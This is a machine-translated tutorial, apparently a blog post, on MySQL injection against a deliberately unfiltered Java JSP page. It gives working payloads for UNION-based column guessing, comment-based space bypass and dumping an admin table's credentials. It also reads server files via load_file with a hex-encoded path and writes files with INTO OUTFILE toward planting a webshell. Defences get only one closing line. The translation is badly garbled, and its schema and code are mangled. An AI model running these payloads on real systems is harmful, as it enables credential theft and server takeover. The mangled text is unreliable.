MYSQL Injection Essence

Preface
I suddenly want to write an article today, I have never written an article, if there is a wrong place please advise. This article needs to have the basic SQL statement knowledge to be able to understand better. It is suggested that people who want to learn more about SQL statements and programming languages can victorious.
I do not hope to get the reader your praise, although I do my best, I just want this article to solve the obstacles in your learning process, I hope you have an early knowledge of the MySQL injection.

the production of 1.MYSQL injections.
The vulnerability occurs because sensitive characters are not filtered in program execution, allowing attackers to pass in malicious strings and merge with structured data query statements, and execute malicious code.
Let's create a program that doesn't have a filter. Because I don't have PHP on my machine, I'm using Java, and I'll comment in detail.
Code
Database:

Create database if not EXISTS ' test '; Use ' test ';/* table structure of the data table ' account ' */drop tables IF EXISTS ' account '; CREATE TABLE ' account ' (  ' accountId ' bigint (a) NOT null auto_increment,  ' accountname ' varchar (+) default NULL,  ' accountpass ' varchar (+) default NULL,  PRIMARY KEY  (' accountId ')) Engine=innodb DEFAULT charset=latin1;/* data table ' account ' data */insert into ' account ' values< c5/> (1, ' account1 ', ' account1 ');/* table structure of the data table ' admin ' */drop tables IF EXISTS ' admin '; CREATE TABLE ' admin ' (  ' Adminid ' bigint () not NULL auto_increment,  ' adminname ' varchar (+) default NULL,  ' AdminPass ' varchar (+) default NULL,  PRIMARY KEY  (' Adminid ')) engine=innodb default charset=latin1;/* data table ' Admin ' data */insert into ' admin ' values  (1, ' admin ', ' admin ');

Program:

<%@ page language= "java" import= "java.util.*,java.sql.*" pageencoding= "Utf-8"%><! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" >
2. Exploitation of vulnerabilities
everyone notice resultset = Statment.executequery ("SELECT * from account where accountId = '" + request.getparameter ("id") + "' ");
the Request.getparameter ("id") here is the ID parameter that gets the get parameter, which is the ID of mysqlinject.jsp?id=1 here. This SQL statement becomes the SELECT * from account where accountId = ' 1 '. What if we change it?

2.1 Detection of vulnerabilities
We write the ID as mysqlinject.jsp?id=1 ' then the SQL statement becomes a SELECT * from account where accountId = ' 1 ', so the SQL statement will error, because the SQL statement value is 2 packets With symbols, such as ' and ', if it's just numbers, you can write nothing. If you do not make an error, the program is replaced, filtered or other methods to protect it .
then we can continue to test, mysqlinject.jsp?id=1 ' and ' = ' then the SQL statement becomes a SELECT * from account where accountId = ' 1 ' and ' = ', should return to normal .

Some people say why my return is not normal? There are 2 reasons, the first is the program to filter out malicious characters; The second is that the program's statement is different from what I wrote. Select * from account where accountId = 1 ' and ' = '. The problem is discussed below. /c2>

2.2 Union query to guess the number of this query column
Some people here would say, guess what's the use of the number of query columns? If it's just testing, but you want to use it further then there is a big use, the article will talk about, patience.

if the person who understands SQL should know the union query? The union query is the union query, and the second query statement merges the return value and the query.

If you want to merge with this query value, what are the conditions? The number of columns that require a union query is equal to the number of columns for this query. If you don't want to wait, you will not be able to merge, then you will get an error. By this feature, you should think of this as the number of columns?

So what we're going to do is make the union query the number of columns equal to the number of columns in the query. That means no error will be equal.
start by guessing from the first column, and then construct the statement Union Select 1 in the Address program's statement.
then the statement is Mysqlinject.jsp?id=1 ' and union Select 1 and ' ' = '.
Some people ask why the back (the green part) should be added and ' = '? Perhaps we remember that our SQL statement requires two containing the symbol, the statement select * from the account where accountId = ' 1 ' we entered in 1 that position, So to remove the "behind", otherwise the statement will be error.
in this procedure it is also ' if you want to eliminate ' there are many ways to make people understand so I now use and ' = '.
First of all, there are several ways to eliminate this '
1. Using and ' = ' is not convenient, but there is no error in complex SQL statements.
2. Use comments # or/**/, so that you can comment out all the things behind, but there is a big problem, that is, when executing complex SQL statements can be error.
Some people test, eh? Why did I add the number? Because this is the use of get parameters, in the address bar to pass the parameter. What do you think of the database that was downloaded with the # NAME? Oh, by the way, #是地址栏的结束符, which means # All the characters are not passed in. Injection injection does not work in get mode.

So what are some of the tools written to Mysqlinject.jsp?id=1 '/**/and/**/union/**/select/**/1/**/and/**/'/**/=/**/'/* When constructing injections? Because there are functions in the program can be passed in the parameters inside the space to remove, if you remove the space, will be the program produced the wrong statement, then will always error. So some of the tools are using/**/to replace the space.

And What about the/**/?/**/is a kind of comment, called a document comment, that is, from/* until the end of */, any code in the middle becomes a comment, so it is a comment that the programmer uses when writing a lot of comments.

what's the last */*? That is used to solve the SQL statement that contains symbols that are not paired.

let's start testing.
mysqlinject.jsp?id=1 '/**/union/**/select/**/1/*
SELECT * from account where accountId = ' 1 '/**/union/**/select/**/1/* '.
have you noticed the lowest sentence?
Javax.servlet.ServletException:The used SELECT statements has a different number of columns
It probably means "this query has a different number of columns," which results in the query not querying a table.

and so on, select 1 Select, and the number of columns that you are writing now is the number of columns in this query.
we see the underground return to 1|2|3|, the value of which is merged from our Union query. Try replacing union Select with a union select 4,5,6. is the underground programmed 4|5|6|?

Some people say you are a liar how I change, I have changed to 789 did not come out, or the actual data, you cheat; I have no deceit, I will not cheat;
Some programs write only the data returned to the first row of the output, but the union query after the data is merged into this query, then he only output the data of this query, in fact, the union query data also have, but he did not output. So what? The wise man must have thought. So, as long as the query does not output can be. Hahaha, I am smart, but how to make this query does not output it? Let's start by telling you a simple way to look at the SQL statements, we've done the limiting conditions. Where AccountId =? , so that means to limit the accoundid to an ID that is not there? The heartbeat is inferior to the action, try.
mysqlinject.jsp?id=1000 '/**/union/**/select/**/4,5,6/*
SELECT * from account where AccountId =1000 '/**/union/**/select/**/4,5,6/*
haha, sure enough.!!! Pay attention to the green part, specify the query a no ID, then he will naturally evaporate.

2.3 Low Odds alternative guess the number of this query column
This method, while less likely, can greatly reduce the workload. The secondary method is only available for simple SQL statements of SELECT *.
This method uses the order sort in MySQL. Sorting is sorted in order. Let's write an SQL statement. Select * from account where accountId = ' 1 ' ORDER by accountId then this SQL statement is sorted in ascending order of accountId. So we don't know what he's going to do, and how do we guess? Here are the key questions. MySQL supports column numbering sort select * from account where accountId = ' 1 ' for order by 1 This is the first column to sort by. 
Gee, you're lying to us again, sort how to guess the number of columns? So I sort by a non-existent column? Like the fourth column? You generally have 3 pockets, a maximum of 10 yuan, one meal a day, a meal of 3 catty meters, a kilo of rice, but you eat 4 kilograms of rice today, need 40 yuan, you have only 3 pockets, You will not have 40 yuan, you will be beaten.
That is, a total of 3 columns, order by 3, sorted by the 3rd column, Normal, order by 4, sorted by 4th column, no 4th column, error. That means he has 4 columns.
This method is based on the experience of people. I usually use this method will be successful, is not a success is not much difference.

2.4 Using union to guess other tables, querying other tables
You can use this method to query the contents of other tables. For example, query the administrator's password, etc. but there is a previous question that must be said to be the table name and the column name. How do you know? guess!!! because MySQL and SQL Server have different system functions, SQL Server has sp_ Helpdb and MySQL did not, so can only guess.
OK, start constructing the statement. Let's guess if there's an admin table.
mysqlinject.jsp?id=1 '/**/union/**/select/**/4,5,6/**/from/**/admin/*
Sql:select * from account where accountId = ' 1 '/**/union/**/select/**/4,5,6/**/from/**/admin/* '

if the normal has the admin table, then the return is normal, if not, will be an error.

you see that? have admin this table, in order to let everyone better understand, we are guessing a other non-existent table.

mysqlinject.jsp?id=1 '/**/union/**/select/**/4,5,6/**/from/**/helloword/*
Sql:select * from account where accountId = ' 1 '/**/union/**/select/**/4,5,6/**/from/**/helloword/* '

you see that? There is no helloworld the table. So the error is.
again, why do you still write 4,5,6? Ah, because we don't know his name, if you write * He will be all listed, if and this query column is not equal, then will be an error. So write an equal.
now that the table name is out, how to list it? Gee, people are too clever to replace one of the 4,5,6 with the name of the list. So it is constructed.
mysqlinject.jsp?id=1 '/**/union/**/select/**/adminid,5,6/**/from/**/admin/*
Sql:select * from account where accountId = ' 1 '/**/union/**/select/**/adminid,5,6/**/from/**/admin/* '

you see that? One of the 1|5|6 is Adminid. If it's normal then it's there. You can guess the name of the column and bring it into the union query, so that the administrator account or password is found. Now I'm going to bring the column names all in.

mysqlinject.jsp?id=1 '/**/union/**/select/**/adminid,adminname,adminpass/**/from/**/admin/*
Sql:select * from account where accountId = ' 1 '/**/union/**/select/**/adminid,adminname,adminpass/**/from/**/ admin/* '

haha, come out, 1|admin|admin| is adminid|adminname|adminpass|
you can also restrict conditions on a union query, such as you know that the user has the admin to construct union select Adminid,adminname,adminpass from admin where adminname = ' Admi n ', look at the individual's play.
2.5 Use the MySQL system function.
2.5.1.1.1 uses the Load_file () function to display the file.
Load_file as the name implies. is the load file, not run Ah, is the display content, but must have read permissions to the file. Let's start by constructing a statement that displays the C:\Boot.ini file.
mysqlinject.jsp?id=1 '/**/union/**/select/**/1,load_file (0x633a5c626f6f742e696e69), 3/*
Sql:select * from account where accountId = ' 1 '/**/union/**/select/**/1, Load_file (0x633a5c626f6f742e696e69), 3/* '
     
Did you see it? The contents of the C:\boot.ini file. Ask again, why Load_file () inside is garbled? That is not garbled, that is C:\boot.ini 16 binary encoding. Because this function cannot handle direct write paths, it can only be used with 16 or ASCII encoding. So the path can be converted to 16 binary or ASCII encoding to execute.
again, why is load_file in the second column position, not in the first column or in the third column position? Because Ah, the first column does not, the other can be, the first column is an int type, a number type, would you put your girlfriend into the men's room? Oh, joke. You can use/to list directories under Linux, but you must have permissions for the column directories.
through the Load_file can be listed directory, read the file, but encountered the file format encoding may encounter garbled problem. This problem can be solved. Use the subString function, SubString (string, start, return).
Assuming we're going to return the third character, then it's mysqlinject.jsp?id=1 '/**/union/**/select/**/1,substring (Load_file ( 0X633A5C626F6F742E696E69), 3, 1), 3/* so we return the third character, which is a very good way to solve garbled characters.
I will be making a tool like this recently and will be posted on my personal homepage.
2.5.1.1.2 write Webshell using outfile.
MySQL has a function that is to output the results of the query. It's outfile. First, construct a simple statement.
Select ' Hello word ' into outfile ' c:\\a.txt ' here is speaking ' Hello word ' output to c:\a.txt
then on the site also to construct a bit.
mysqlinject.jsp?id=1 '/**/union/**/select/**/1, ' hello ', 3/**/into/**/outfile/**/' c:\\hello.txt '/*
Sql:select * from account where accountId = ' 1 '/**/union/**/select/**/1, ' hello ', 3/**/into/**/outfile/**/' c:\\he Llo.txt '/* '
successfully inserted. But why did it get an error? Oh, that's because you wrote the data into a file, and returned to the collection. If you replace Hello with a word or something else, if you write it to a website directory, it's scary ...

2. Protection and summary of vulnerabilities
protect by filtering special keywords. The code site is a lot, I don't write it here.
There is a protective measure against Java, which is to use the PreparedStatement object to query, and here is not much to say.
MYSQL Injection Essence